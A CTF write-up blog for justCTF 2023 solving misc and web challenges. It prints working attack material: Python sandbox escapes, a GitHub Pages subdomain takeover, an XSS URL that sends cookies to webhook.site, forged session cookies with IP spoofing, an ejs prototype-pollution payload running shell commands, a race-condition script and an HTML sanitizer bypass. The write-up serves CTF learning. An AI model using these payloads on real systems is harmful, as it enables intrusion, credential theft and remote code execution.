justCTF 2023 WriteUps
This week I solved some web and misc challenges with team TSJ.
Misc
ECC for Dummies
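This challenge randomly generates some booleans (cards) and lets you ask questions about them (Python expressions built from cards[i], filtered through an AST check). A few of the answers it returns are deliberately wrong, so the ECC in the title presumably stands for Error Correcting Code.
However, len(cards) == 5 here, so simply sending 0 0 0 0 0 as the answer is already correct with probability 1/32, and brute force is enough.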
while true; do echo '1\n1\n1\n1\n1\n1\n1\n1\n0 0 0 0 0\n' | nc eccfordummies.nc.jctf.pro 1337 | grep flag; done
# justCTF{S0me7ime$_L0Gic_1s_n0T_B1n4ry_0101}
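As a rough sanity check on the brute-force approach, here is a minimal sketch of the arithmetic. It assumes each connection is an independent attempt and that the five cards are uniformly random, so a fixed guess is right with probability 1/32; the function names are illustrative and not part of the challenge.

```python
from fractions import Fraction

# Assumption: 5 independent, uniformly random booleans per connection.
P_SUCCESS = Fraction(1, 2**5)


def expected_attempts(p):
    """Mean of a geometric distribution: average number of tries until success."""
    return 1 / p


def success_within(n, p=P_SUCCESS):
    """Probability that at least one of n independent attempts succeeds."""
    return 1 - (1 - p) ** n


if __name__ == "__main__":
    print("expected attempts:", expected_attempts(P_SUCCESS))
    for n in (32, 100, 200):
        print(n, "attempts ->", float(success_within(n)))
```

Under these assumptions a few hundred connections are almost certain to hit the flag, which is why the shell loop above does not need anything smarter.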
Later I found out that the AST filter was not written properly at all; the simplest approach is to send breakpoint() directly, and it passes XD.
ECC not only for Dummies
This version adds a PoW and changes a few things, but the AST filter is still broken, so breakpoint() works here too XD.
breakpoint()
open('flag.txt').read()
# justCTF{S4nd_S0metim3s_It$_EvEn_$0lv4ble}
If you want a proper Error Correcting Code challenge, I recommend WMCTF's nanoDiamond(-rev).
PyPlugins
#!/usr/bin/env python3.10
import dis
import os
import sys
import re
import runpy
import py_compile
import requests
PLUGINS_PATH = "/plugins/"
TRUSTED_DOMAINS = [
'blackhat.day',
'veganrecipes.soy',
'fizzbuzz.foo',
]
def banner():
print("1. List known websites")
print("2. List plugins")
print("3. Download plugin")
print("4. Load plugin")
print("5. Exit")
def list_known_websites():
print("great.veganrecipes.soy")
print("uplink.blackhat.day")
print("plugandplay.fizzbuzz.foo")
def list_plugins():
print("Plugins:")
for f in os.listdir(PLUGINS_PATH):
print(f" {f}")
PATH_RE = re.compile(r"^[A-Za-z0-9_]+$")
MAX_SIZE = 4096
def _get_file(url):
with requests.get(url, stream=True) as r:
r.raise_for_status()
chunks = 0
for chunk in r.iter_content(chunk_size=4096):
return chunk
raise Exception("")
def download_plugin():
print("Provide plugin url in a form of A.B.C where A,B,C must be [A-Za-z0-9_]+")
url = input("url: ").strip()
try:
a, b, c = url.split(".")
if not all(PATH_RE.match(x) for x in (a, b, c)):
print("FAIL:",a,b,c)
raise Exception()
except:
print("ERR: Invalid url format. Cannot download plugin.")
return
domain = f"{b}.{c}"
if domain not in TRUSTED_DOMAINS:
print("ERR: Domain not trusted. Aborting.")
return
url = f"https://{a}.{b}.{c}/"
try:
code = _get_file(url).decode()
# Validate plugin code
cobj = test_expr(code, ALLOWED_OPCODES)
# Constants must be strings!
assert all(type(c) in (str, bytes, type(None)) for c in cobj.co_consts)
except Exception as e:
print(f"ERR: Couldnt get plugin or plugin is invalid. Aborting.")
return
# TODO/FIXME: So far our plugins will just print global strings
# We should make it more powerful in the future, but at least it is secure for now
code += '\nx = [i for i in globals().items() if i[0][0]!="_"]\nfor k, v in x: print(f"{k} = {v}")'
with open(f"{PLUGINS_PATH}/{a}_{b}.py", "w") as f:
f.write(code)
### Code copied from Pwntools safeeval lib
# see https://github.com/Gallopsled/pwntools/blob/c72886a9b9/pwnlib/util/safeeval.py#L26-L67
# we did a small modification: we pass 'exec' instead of 'eval' to `compile`
def _get_opcodes(codeobj):
if hasattr(dis, 'get_instructions'):
return [ins.opcode for ins in dis.get_instructions(codeobj)]
i = 0
opcodes = []
s = codeobj.co_code
while i < len(s):
code = six.indexbytes(s, i)
opcodes.append(code)
if code >= dis.HAVE_ARGUMENT:
i += 3
else:
i += 1
return opcodes
def test_expr(expr, allowed_codes):
allowed_codes = [dis.opmap[c] for c in allowed_codes if c in dis.opmap]
try:
c = compile(expr, "", "exec")
except SyntaxError as ex:
print(ex)
raise ValueError("%r is not a valid expression" % expr)
codes = _get_opcodes(c)
for code in codes:
if code not in allowed_codes:
raise ValueError("opcode %s not allowed" % dis.opname[code])
return c
ALLOWED_OPCODES = ["LOAD_CONST", "STORE_NAME", "RETURN_VALUE"]
def load_plugin():
"""
Loads the plugin performing various sanity checks.
A plugin must only define strings in it.
"""
plugin = input("plugin: ").strip()
if not PATH_RE.match(plugin):
print("Invalid plugin name. Aborting.")
return
plugin_path = f"{PLUGINS_PATH}/{plugin}.py"
if not os.path.exists(plugin_path):
print("Path not found: %s" % plugin_path)
return
# We validated the plugin when we downloaded it
# so it must be secure to run it now: it should just print globals.
runpy.run_path(py_compile.compile(plugin_path))
funcs = {
1: list_known_websites,
2: list_plugins,
3: download_plugin,
4: load_plugin,
5: sys.exit
}
def main():
print("Welcome to the PyPlugins challenge!")
print("We will load your Python plugins, but only if they are hosted on a trusted website and if they cannot harm us.")
while True:
banner()
n = input('> ')
try:
n = int(n)
func = funcs[n]
except:
print("Wrong input. Try again")
continue
try:
func()
except Exception as e:
print(f"Faild")
raise
if __name__ == '__main__':
main()
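In short, this challenge downloads a plugin from one of the listed domains and runs it, but the plugin may only use the three opcodes LOAD_CONST, STORE_NAME, and RETURN_VALUE, so it is essentially a pyjail.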
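To get a feel for what the opcode allowlist permits, the following sketch lists the opcodes of a plain string assignment and of a snippet containing a call. The helper names are my own, and exact opcode names vary between CPython versions (newer versions add opcodes such as RESUME that 3.10 does not have), so treat the printed lists as illustrative.

```python
import dis


def opcode_names(source):
    """Compile source in exec mode (without running it) and list its opcode names."""
    code = compile(source, "<plugin>", "exec")
    return [ins.opname for ins in dis.get_instructions(code)]


def has_call(source):
    """True if any opcode looks like a call (CALL, CALL_FUNCTION, ...)."""
    return any("CALL" in name for name in opcode_names(source))


if __name__ == "__main__":
    print(opcode_names("x = 'hello'"))    # only loads a constant and stores a name
    print(opcode_names("breakpoint()"))   # contains a call opcode, so the filter rejects it
```

Any plugin that calls a function at the bytecode level fails the check, which is why the bypass has to make the validated code and the executed code differ.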
The first step is getting around the domain restriction. Running dig on subdomains of those domains shows that they are basically wildcard CNAMEs pointing at GitHub Pages:
*.blackhat.day -> whateverherebecausewhocares.github.io
*.veganrecipes.soy -> dc3dtest.github.io
*.fizzbuzz.foo -> howdoesthiswork.github.io
So a subdomain takeover is possible.
The method is simple. For example, to take over maple.blackhat.day, create a repo named whateverherebecausewhocares.github.io under your own account, add a CNAME file containing maple.blackhat.day, then open the Pages section of the repo settings and wait a bit for the takeover to complete.
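What remains is the pyjail part. I noticed that the expr passed to compile(expr, "", "exec") is a str, whereas once the code has been written to a file it is executed from bytes. When Python is given source code as bytes, it honors a #coding: ... comment, so I used that to bypass the check: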
#coding: raw_unicode_escape
x='PEKO\u0027\u002b\u0062\u0072\u0065\u0061\u006b\u0070\u006f\u0069\u006e\u0074\u0028\u0029\u002b\u0027'
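The difference between str and bytes source can be reproduced locally with compile() alone. This is a small sketch using a harmless expression instead of breakpoint(); the SOURCE string and the run helper are illustrative, and it relies on compile() ignoring the coding comment for str input while honoring it for bytes input.

```python
# The same text, once as str and once as bytes.
SOURCE = "#coding: raw_unicode_escape\nx='A\\u0027+str(1+1)+\\u0027B'\n"


def run(source):
    """Compile and execute source, returning the resulting value of x."""
    namespace = {}
    exec(compile(source, "<demo>", "exec"), namespace)
    return namespace["x"]


# str input: the coding comment is ignored, so \u0027 is just an escape
# inside one long string literal (what the validator sees).
as_text = run(SOURCE)

# bytes input: the source is first decoded with raw_unicode_escape, turning
# \u0027 into real quote characters that end the literal early.
as_bytes = run(SOURCE.encode("ascii"))

if __name__ == "__main__":
    print(repr(as_text))
    print(repr(as_bytes))
```

In the str case the whole payload stays inside a single constant, so only LOAD_CONST and STORE_NAME appear; in the bytes case the quotes close the literal and the text in between becomes live code.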
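However, the flag is justCTF{GitHub_P4g3s_Subd0ma1ns_And_Z1pp3d_Pycs_Ar3_Cr4zy!}, so this was clearly not the intended solution XD.
The intended solution is a CPython 0day (?): py/pyc/zip file type confusion.
In short, Python accepts a zip file as input (see zipapp), and internally this works much like ordinary zip extraction: it looks for the zip end of central directory record and so on. Separately, CPython has pyc files, which contain a header and a code object, and the code object carries co_consts.
So if a Python file contains a very long bytes literal that embeds a zip, the literal is stored verbatim inside the compiled pyc, and when that pyc is executed CPython mistakes it for a zip because of the zip signature and runs it as one. For further details, see: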
Python Zip confusion: POC
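The reason a zip can hide inside another file is that zip readers locate the archive from the end of the data rather than from the start. The sketch below illustrates only that general property with the standard zipfile module; it is not the CPython code path involved in the challenge, and the junk prefix merely stands in for a pyc header and surrounding bytes.

```python
import io
import zipfile


def make_zip(files):
    """Build an in-memory zip archive from a {name: text} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


archive = make_zip({"__main__.py": "print('hello from zip')\n"})

# Prepend unrelated bytes, standing in for whatever precedes the embedded zip.
blob = b"\x00fake header and other data\x00" * 4 + archive

# The reader finds the end of central directory record near the end of the
# data and works backwards, so the prefix does not prevent it from opening.
with zipfile.ZipFile(io.BytesIO(blob)) as zf:
    names = zf.namelist()
    main_source = zf.read("__main__.py").decode()

if __name__ == "__main__":
    print(names)
    print(main_source)
```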
Web
eXtra Safe Security layers
The core of this challenge is this code:
app.use((req, res, next) => {
if (req.query) {
// Saferty layer 2
const s = JSON.stringify(req.query).toLowerCase();
for (const b of blacklist) {
if (s.includes(b.toLowerCase())) {
return res.status(403).send("You are not allowed to do that.");
}
}
// Safety layer 3
for (const c of s) {
if (c.charCodeAt(0) > 127 || c.charCodeAt(0) < 32) {
return res.status(403).send("You are not allowed to do that.");
}
}
}
if (req.cookies?.admin === adminCookie) {
res.user = {
isAdmin: true,
text: "Welcome back :)",
unmodifiable: {
background: "admin_background.png",
CSP: `default-src 'self'; img-src 'self'; style-src '${css}'; script-src '${adminJs}' '${commonJs}';`,
},
};
} else {
// Safety layer 4
res.user = {
text: "Hi! You can modify this text by visiting `?text=Hi`. But I must warn you... you can't have html tags in your text.",
unmodifiable: {
background: "background.png",
},
};
}
if (req.query.text) {
res.user = { ...res.user, ...req.query };
}
// Safety layer 5
res.set("Content-Security-Policy", res.user.unmodifiable.CSP ?? defaultCSP);
next();
});
The ejs template also contains this:
<script>
// load background...
main.innerHTML += `
<img class='background' src='<%- unmodifiable?.background %>'>
`;
console.log('Loaded!');
</script>
The blacklist only contains common JS functions such as alert and eval, so it is easy to bypass. The real key is res.user = { ...res.user, ...req.query }: a query string can build an object that overrides unmodifiable, which lets us change both CSP and background, and background allows direct code injection.
http://xssl.web.jctf.pro/?text=a&unmodifiable[CSP]=a&unmodifiable[background]=`;location.assign(%27https://webhook.site/XXXXX?%27%2Bdocument.cookie);`
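The override works because the spread is a shallow merge: a top-level key from the query replaces the whole nested object. A Python analogue using dict unpacking is sketched below; the dictionaries are simplified stand-ins for res.user and for the object that the query parser builds from unmodifiable[CSP]=a and unmodifiable[background]=..., and the payload string is a placeholder.

```python
def merge_user(user, query):
    """Python analogue of `{ ...res.user, ...req.query }`: later keys win, shallowly."""
    return {**user, **query}


default_user = {
    "text": "Hi!",
    "unmodifiable": {"background": "background.png"},
}

# Assumed shape of the parsed query string (nested keys become a nested object).
attacker_query = {
    "text": "a",
    "unmodifiable": {"CSP": "a", "background": "`;PAYLOAD;`"},
}

merged = merge_user(default_user, attacker_query)

if __name__ == "__main__":
    print(merged["unmodifiable"])
```

Because the nested unmodifiable object is replaced wholesale, the attacker controls both the CSP header value and the string interpolated into the template's script block.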
Dangerous
require "sinatra"
require "sqlite3"
require "erubi"
require "digest"
require "json"
config = JSON.parse(File.read("./config.json"))
set :bind, '0.0.0.0'
enable :sessions
set :erb, :escape_html => true
con = SQLite3::Database.new "sqlite.db"
con.execute "CREATE TABLE IF NOT EXISTS threads(
id INTEGER PRIMARY KEY AUTOINCREMENT,
content TEXT,
ip TEXT,
username TEXT
);"
con.execute "CREATE TABLE IF NOT EXISTS replies(
id INTEGER PRIMARY KEY AUTOINCREMENT,
content TEXT,
ip TEXT,
username TEXT,
thread_id INTEGER
);"
def get_threads(con)
return con.execute("SELECT * FROM threads ORDER BY id DESC;")
end
def get_replies(con, id)
return con.execute("SELECT *, null, 0 as p FROM threads WHERE id=?
UNION SELECT *, 1 as p FROM replies WHERE thread_id=? order by p", [id, id])
end
def is_allowed_ip(username, ip, config)
return config["mods"].any? {
|mod| mod["username"] == username and mod["allowed_ip"] == ip
}
end
get "/" do
@threads = get_threads(con)
erb :index
end
post "/thread" do
if params[:content].nil? or params[:content] == "" then
raise "Thread content cannot be empty!"
end
if session[:username] then
username = is_allowed_ip(session[:username], request.ip, config) ? session[:username] : nil
end
# === temporarily disabled ===
# con.execute("INSERT INTO threads (id, content, ip, username)
# VALUES (?, ?, ?, ?)", [nil, params[:content], request.ip, username])
redirect to("/#{con.execute('SELECT last_insert_rowid()')[0][0]}")
end
get "/flag" do
if !session[:username] then
erb :login
elsif !is_allowed_ip(session[:username], request.ip, config) then
return [403, "You are connecting from untrusted IP!"]
else
return config["flag"]
end
end
post "/login" do
if config["mods"].any? {
|mod| mod["username"] == params[:username] and mod["password"] == params[:password]
} then
session[:username] = params[:username]
redirect to("/flag")
else
return [403, "Incorrect credentials"]
end
end
get "/:id" do
@id = params[:id]
@replies = get_replies(con, @id)
erb :thread
end
post "/:id" do
if params[:content].nil? or params[:content] == "" then
raise "Reply content cannot be empty!"
end
if session[:username] then
username = is_allowed_ip(session[:username], request.ip, config) ? session[:username] : nil
end
@id = params[:id]
# === temporarily disabled ===
# con.execute("INSERT INTO replies (id, content, ip, username, thread_id)
# VALUES (?, ?, ?, ?, ?)", [nil, params[:content], request.ip, username, @id])
redirect to("/#{@id}")
end
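A Ruby challenge, run directly with ruby dangerous.rb. Sending a POST to /thread with empty content produces an error page, which shows that the app runs in debug mode, so the session secret can be found on that page.
Having the session secret means the cookie can be modified freely, and underneath it is deserialized with Ruby's Marshal.load. However, none of the payloads I found on Google worked on this Ruby 3.2 version, so I only used it to modify session[:username].
From the provided site we know the admin's username is janitor. There are also two threads that contain admin posts, and thread.erb contains: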
<% @replies.each do |reply| %>
<div style="padding-bottom: 1rem">
<% user_color = Digest::SHA256.hexdigest(reply[2] + @id).slice(0, 6) %>
<div style="color: #<%= user_color %>;">
<%= user_color %>
<% if reply[3] %>
<span style="color: #ff0000;">##Admin:<%= reply[3] %>##</span>
<% end %>
</div>
<div><%= reply[1] %></div>
</div>
<% end %>
So we know sha256(admin_ip + '1')[:6] and sha256(admin_ip + '2')[:6], and since the IPv4 space is small, it can be brute-forced directly:
from hashlib import sha256
from concurrent.futures import ProcessPoolExecutor
def task(a):
    print(f"{a} started")
    for b in range(256):
        for c in range(256):
            for d in range(256):
                ip = f"{a}.{b}.{c}.{d}"
                h1 = sha256((ip + "1").encode()).hexdigest()[:6]
                h2 = sha256((ip + "2").encode()).hexdigest()[:6]
                if h1 == "32cae2" and h2 == "92e1e8":
                    print(ip)
with ProcessPoolExecutor(max_workers=8) as executor:
    for a in range(256):
        executor.submit(task, a)
The resulting IP is 10.24.170.69, so modifying the session and spoofing the IP with X-Forwarded-For yields the flag.
import hashlib, hmac, base64
from urllib.parse import quote, unquote
from Crypto.Cipher import AES
from subprocess import check_output
import requests
import os
sess = unquote(requests.get("http://dangerous.web.jctf.pro/flag").cookies["rack.session"])
print(sess)
secret = "a9316e61bc75029d52f915823d7bb628a4adae8b174bce89fd38ec4c7fb925a07e2ccbc01572b9fdce56502ef5d02609e5194a5ddd649ff349a206002e96a99d"
key = bytes.fromhex(secret)[:32]
ct, iv, auth = map(base64.b64decode, sess.split("--"))
cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
hh = cipher.decrypt_and_verify(ct, auth).hex()
out = check_output(
["ruby"],
input=f"""
hex_data = "{hh}"
data = [hex_data].pack("H*")
r = Marshal.load(data)
puts r
r["username"] = "janitor"
puts r
puts Marshal.dump(r).unpack("H*")[0]
""".encode(),
).decode()
print(out)
pt = bytes.fromhex(out.split("\n")[-2])
iv = os.urandom(len(iv))
cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
ct, auth = cipher.encrypt_and_digest(pt)
sess = b"--".join(map(base64.b64encode, [ct, iv, auth])).decode()
print(sess)
r = requests.get(
"http://dangerous.web.jctf.pro/flag",
cookies={"rack.session": quote(sess)},
headers={"X-Forwarded-For": "10.24.170.69"},
)
print(r.text)
# justCTF{1_th1nk_4l1ce_R4bb1t_m1ght_4_4_d0g}
Perfect Product
This challenge uses ejs 3.1.9, and the core code is:
app.all('/product', (req, res) => {
const params = req.query || {};
Object.assign(params, req.body || {});
let name = params.name
let strings = params.v;
if(!(strings instanceof Array) && !Array.isArray(strings)){
strings = ['NaN', 'NaN', 'NaN', 'NaN', 'NaN'];
}
// make _0 to point to all strings, copy to prevent reference.
strings.unshift(Array.from(strings));
const data = {};
for(const idx in strings){
data[`_${idx}`] = strings[idx];
}
if(typeof name !== 'string'){
name = `Product: NaN`;
}else{
name = `Product: ${name}`;
}
data['productname'] = name;
data['print'] = !!params.print;
res.render('product', data);
});
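Clearly the goal is to modify the ejs settings through data and then get RCE via code injection.
From this reference we know that data.settings has to be populated, which looks impossible from the code alone. Taking the JS prototype mechanism into account, though, polluting data.__proto__.settings works just as well, so we need a way to make strings something other than a real array.
A simple way to get past that assignment is to make strings instanceof Array true. In JS, { __proto__: [] } instanceof Array holds, so ?v[__proto__][0]&v[_proto__][x]=0 gives data.__proto__.x === '0'.
Next I tried the payload from that reference, but code injection with it is troublesome: the payload in options has to match part of the ejs content. Then I remembered that a similar challenge in FCSC 2023, which I played not long ago, also required RCE through ejs settings, and back then I had found this gadget: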
const payload = {
settings: {
'view options': {
debug: true,
client: true,
escapeFunction: '(() => {});return process.mainModule.require("child_process").execSync("cat /app/flag*").toString()'
}
}
}
Someone else's writeup (in French): FCSC 2023 : Peculiar Caterpillar
That challenge also used ejs 3.1.9, so the gadget can be reused as is:
curl -H 'Content-Type: application/json' -g 'http://sy0rdzpzb0mexasqml3bzv9tqtgqo3.perfectproduct.web.jctf.pro/product?v[__proto__][0]&v[2]=1&v[3]=1&v[4]=1' -G --data-urlencode 'v[_proto__][settings][view%20options][debug]=true' --data-urlencode 'v[_proto__][settings][view%20options][client]=true' --data-urlencode 'v[_proto__][settings][view%20options][escapeFunction]=(() => {});return process.mainModule.require("child_process").execSync("/readflag").toString()' --data-urlencode 'v[_proto__][cache]='
# justCTF{found_the_bug_myself_but_i_guess_people_like_to_report_0days_publicly}
Also, ejs now states that this kind of bug (?) is not considered a bug (see Out-of-Scope Vulnerabilities), so it apparently will not be fixed.
Aquatic Delights
#!/usr/bin/env python
import flask
import json
import sqlite3
from os import getenv
app = flask.Flask(__name__, static_url_path='/static')
DATABASE = None
def database_connection(func):
def wrapper(self, *args, **kwargs):
with sqlite3.connect('/tmp/shop.db') as con:
if hasattr(self, 'locked') and self.locked:
return flask.jsonify({'result': 'NG', 'reason': 'Database is locked!'}), 500
try:
return func(self, con.cursor(), *args, **kwargs)
except Database.Error as ex:
return flask.jsonify({'result': 'NG', 'reason': str(ex)}), 500
except:
return flask.abort(500, 'Something went wrong')
return wrapper
def database_lock(func):
def wrapper(self, *args, **kwargs):
try:
self.locked = True
result = func(self, *args, **kwargs)
except:
raise
finally:
self.locked = False
return result
return wrapper
class Database(object):
@database_connection
def __init__(self, cur):
self.just_coins = 10
cur.execute("DROP TABLE IF EXISTS shop")
cur.execute("CREATE TABLE shop(name, price, available)")
shop_data = [
('Catfish', 1, 10),
('Rainbow Guppy', 5, 5),
('Koi Carp', 20, 3),
('Royal Angelfish', 100, 1),
('Flagfish', 1337, 1)
]
cur.executemany("INSERT INTO shop(name, price, available) VALUES(?, ?, ?)", shop_data)
cur.execute("DROP TABLE IF EXISTS inventory")
cur.execute("CREATE TABLE inventory(name, available)")
cur.executemany("INSERT INTO inventory(name, available) VALUES(?, ?)",
[
(name, 0) for name, _, _ in shop_data
]
)
def _get_shop(self, cur, name=None):
if name is None:
return {x[0]: x[1:] for x in cur.execute("SELECT * FROM shop")}
else:
cur.execute("SELECT price, available FROM shop WHERE name = ?", (name,))
return cur.fetchone()
def _get_inventory(self, cur, name=None):
if name is None:
return {x[0]: x[1] for x in cur.execute("SELECT * FROM inventory")}
else:
cur.execute("SELECT available FROM inventory WHERE name = ?", (name,))
return cur.fetchone()[0]
def _update_shop(self, cur, name, available):
cur.execute("UPDATE shop SET available = ? WHERE name = ?", (available, name))
def _update_inventory(self, cur, name, available):
cur.execute("UPDATE inventory SET available = ? WHERE name = ?", (available, name))
def _get_shop_data(self, cur):
data = {}
shop = self._get_shop(cur)
inventory = self._get_inventory(cur)
for name, item in shop.items():
data[name.replace(' ', '_')] = {
'price': item[0],
'available': item[1],
'eat': inventory.get(name)
}
return data
class Error(Exception):
pass
@database_connection
@database_lock
def buy(self, cur, name, amount):
shop_price, shop_available = self._get_shop(cur, name)
inv_available = self._get_inventory(cur, name)
if shop_available == 0: raise Database.Error('There is no more item of this type in shop')
if amount <= 0 or amount > 0xffffffff: raise Database.Error('Invalid amount')
if shop_available < amount: raise Database.Error('Not enough items in shop')
total_price = shop_price * amount
if total_price > self.just_coins: raise Database.Error('Not enough justCoins')
self.just_coins -= total_price
self._update_inventory(cur, name, inv_available + amount)
self._update_shop(cur, name, shop_available - amount)
return flask.jsonify({'result': 'OK', 'response': f'Successfully bought {amount} {name}',
'justCoins': DATABASE.just_coins, 'data': self._get_shop_data(cur)})
@database_connection
@database_lock
def sell(self, cur, name, amount):
inv_available = self._get_inventory(cur, name)
if inv_available < amount: raise Database.Error('Not enough items in inventory')
if amount <= 0 or amount > 0xffffffff: raise Database.Error('Invalid amount')
shop_price, shop_available = self._get_shop(cur, name)
total_price = shop_price * amount
self.just_coins += total_price
self._update_inventory(cur, name, inv_available - amount)
self._update_shop(cur, name, shop_available + amount)
return flask.jsonify({'result': 'OK', 'response': f'Successfully sold {amount} {name}',
'justCoins': DATABASE.just_coins, 'data': self._get_shop_data(cur)})
@database_connection
def eat(self, cur, name):
inv_available = self._get_inventory(cur, name)
if inv_available <= 0: raise Database.Error('Not enough items in inventory')
self._update_inventory(cur, name, inv_available - 1)
if name == 'Flagfish':
response = getenv("FLAG")
else:
response = 'Nothing happened'
return flask.jsonify({'result': 'OK', 'response': response, 'justCoins': DATABASE.just_coins,
'data': self._get_shop_data(cur)})
@database_connection
def get_table(self, cur):
return flask.render_template('table.html', inv=DATABASE._get_inventory(cur), shop=DATABASE._get_shop(cur))
@database_connection
def get_inventory(self, cur=None):
return self._get_inventory(cur)
@database_connection
def get_shop(self, cur=None):
return self._get_shop(cur)
@app.route('/', methods=['GET'])
def index():
return flask.render_template('index.html', just_coins=DATABASE.just_coins, inv=DATABASE.get_inventory(), shop=DATABASE.get_shop())
@app.route('/api/buy', methods=['POST'])
def api_buy():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
assert isinstance(data['amount'], int)
except:
return flask.abort(400, 'Invalid request')
return DATABASE.buy(data['name'], data['amount'])
@app.route('/api/sell', methods=['POST'])
def api_sell():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
assert isinstance(data['amount'], int)
except:
return flask.abort(400, 'Invalid request')
return DATABASE.sell(data['name'], data['amount'])
@app.route('/api/eat', methods=['POST'])
def api_eat():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
except:
return flask.abort(400, 'Invalid request')
return DATABASE.eat(data['name'])
@app.route('/reset', methods=['GET'])
def reset():
DATABASE.__init__()
return flask.redirect("/")
if __name__ == '__main__':
DATABASE = Database()
app.run(host="0.0.0.0", port=8080)
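A very standard shop app. Both buy and sell take a database lock, so in theory there should be no race condition.
However, after modifying database_connection slightly to record the number of concurrent entries, I found that it does not actually lock the database well: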
def database_connection(func):
    def wrapper(self, *args, **kwargs):
        if getattr(self, 'entry', None) is None:
            self.entry = 0
        with sqlite3.connect('/tmp/shop.db') as con:
            if hasattr(self, 'locked') and self.locked:
                return flask.jsonify({'result': 'NG', 'reason': 'Database is locked!'}), 500
            try:
                self.entry += 1
                import sys
                print(self.entry, file=sys.stderr)
                return func(self, con.cursor(), *args, **kwargs)
            except Database.Error as ex:
                return flask.jsonify({'result': 'NG', 'reason': str(ex)}), 500
            except:
                return flask.abort(500, 'Something went wrong')
            finally:
                self.entry -= 1
    return wrapper
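Multiple requests can be in the transition between database_connection and database_lock at the same time, so plain spamming still has a chance of winning the race; the probability is just lower than it would be without the lock.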
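The gap between checking the locked flag and setting it can be shown deterministically with a small model. This is only a sketch: FakeDatabase and guarded_call are hypothetical stand-ins for the two decorators, and a threading.Barrier is used to force both threads into the window between the check and the set, which on the real server happens only by chance.

```python
import threading


class FakeDatabase:
    """Hypothetical stand-in for the Database object with its `locked` flag."""

    def __init__(self):
        self.locked = False
        self.inside = 0        # threads currently inside the "critical section"
        self.max_inside = 0    # highest concurrency observed
        self.counter_guard = threading.Lock()


def guarded_call(db, gate):
    # Step 1 (database_connection): check the flag.
    if db.locked:
        return False
    # Both threads pause here, after the check but before the flag is set.
    gate.wait(timeout=5)
    # Step 2 (database_lock): set the flag, too late to exclude the other thread.
    db.locked = True
    with db.counter_guard:
        db.inside += 1
        db.max_inside = max(db.max_inside, db.inside)
    gate.wait(timeout=5)  # keep both threads inside at the same moment
    with db.counter_guard:
        db.inside -= 1
    db.locked = False
    return True


def simulate():
    db = FakeDatabase()
    gate = threading.Barrier(2)
    threads = [threading.Thread(target=guarded_call, args=(db, gate)) for _ in range(2)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return db.max_inside


max_concurrent = simulate()

if __name__ == "__main__":
    print("threads inside at once:", max_concurrent)
```

A check-then-set flag is not atomic, so both callers read the same stale shop and inventory state; an actual mutex acquired before the check would close the window.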
So I wrote a script to brute-force the race. It sells more often than it buys, so the coin count goes up:
import requests
from threading import Thread
# host = "http://localhost:8080"
host = "http://lcy5kjz4es4502p3acpac6czn5t4gs.aquatic-sgp1.web.jctf.pro"
def buy(name, amount):
    try:
        return requests.post(
            host + "/api/buy", json={"name": name, "amount": amount}
        ).json()
    except:
        pass
def sell(name, amount):
    try:
        return requests.post(
            host + "/api/sell", json={"name": name, "amount": amount}
        ).json()
    except:
        pass
def eat(name):
    try:
        return requests.post(host + "/api/eat", json={"name": name}).json()
    except:
        pass
def reset():
    requests.get(host + "/reset", allow_redirects=False).text
def main():
    # tune this according to current total coins
    # cur = ("Catfish", 10)
    # cur = ("Rainbow Guppy", 3)
    # cur = ("Koi Carp", 8)
    cur = ("Royal Angelfish", 4)
    def bb():
        r = buy(*cur)
        if r is not None and "justCoins" in r:
            tot = r["justCoins"]
            for name, d in r["data"].items():
                tot += d["price"] * d["eat"]
            print("b", r["justCoins"], tot)
    def ss():
        r = sell(*cur)
        if r is not None and "justCoins" in r:
            tot = r["justCoins"]
            for name, d in r["data"].items():
                tot += d["price"] * d["eat"]
            print("s", r["justCoins"], tot)
    while True:
        Thread(target=bb).start()
        Thread(target=ss).start()
        Thread(target=ss).start()
        Thread(target=ss).start()
main()
# justCTF{r4c3_w1nn3r_w1nn3r_ch1ck3n_d1nn3r!}
Phantom
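This challenge has a very simple account registration system. After logging in you can edit your own name and description, and the flag is in the admin bot's name.
The description goes through this filter: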
func isSafeHTML(input string) bool {
var buffer bytes.Buffer
tokenizer := html.NewTokenizer(strings.NewReader(input))
for {
tt := tokenizer.Next()
switch {
case tt == html.ErrorToken:
return true
case tt == html.StartTagToken, tt == html.EndTagToken, tt == html.SelfClosingTagToken:
token := tokenizer.Token()
if len(token.Attr) > 0 {
return false
}
switch token.Data {
case "h1", "h2", "h3", "h4", "h5", "h6", "b", "i", "a", "img", "p", "code", "svg", "textarea":
buffer.WriteString(token.String())
default:
return false
}
case tt == html.TextToken:
buffer.WriteString(tokenizer.Token().String())
default:
return false
}
}
}
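Seeing <svg> reminded me that parsing inside <svg> is XML-like, whereas the content of <textarea> does not need to be escaped (RCDATA state). So <svg><textarea></svg><script>... should in theory pass the filter, and a quick test confirmed it.
I knew this because I recently found a very similar XSS in Joplin.
What remains is bypassing the CSRF protection to log in or edit the profile. Reading the code shows that profileEdit (/profile/edit) is a bit unusual: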
func profileEditHandler(w http.ResponseWriter, r *http.Request) {
if r.Method == http.MethodGet {
session, _ := store.Get(r, "session")
if auth, ok := session.Values["authenticated"].(bool); !ok || !auth {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
username := session.Values["username"].(string)
if user, ok := Users[username]; ok {
data := map[string]interface{}{
"User": user,
"csrfToken": csrf.Token(r),
}
templates.ExecuteTemplate(w, "edit", data)
} else {
http.Error(w, "Unauthenticated", http.StatusUnauthorized)
return
}
} else {
// handle file upload
session, _ := store.Get(r, "session")
if auth, ok := session.Values["authenticated"].(bool); !ok || !auth {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
name := r.FormValue("name")
description := r.FormValue("description")
username := session.Values["username"].(string)
if user, ok := Users[username]; ok {
if isSafeHTML(description) {
descriptionHTML, err := html.Parse(strings.NewReader(description))
var buf bytes.Buffer
html.Render(&buf, descriptionHTML)
if err != nil {
http.Error(w, "Forbidden", http.StatusForbidden)
}
if len(name) > 0 {
user.Name = name
}
user.Description = buf.String()
data := map[string]interface{}{
"Name": user.Name,
"Description": template.HTML(user.Description),
}
templates.ExecuteTemplate(w, "profile", data)
} else {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
}
}
}
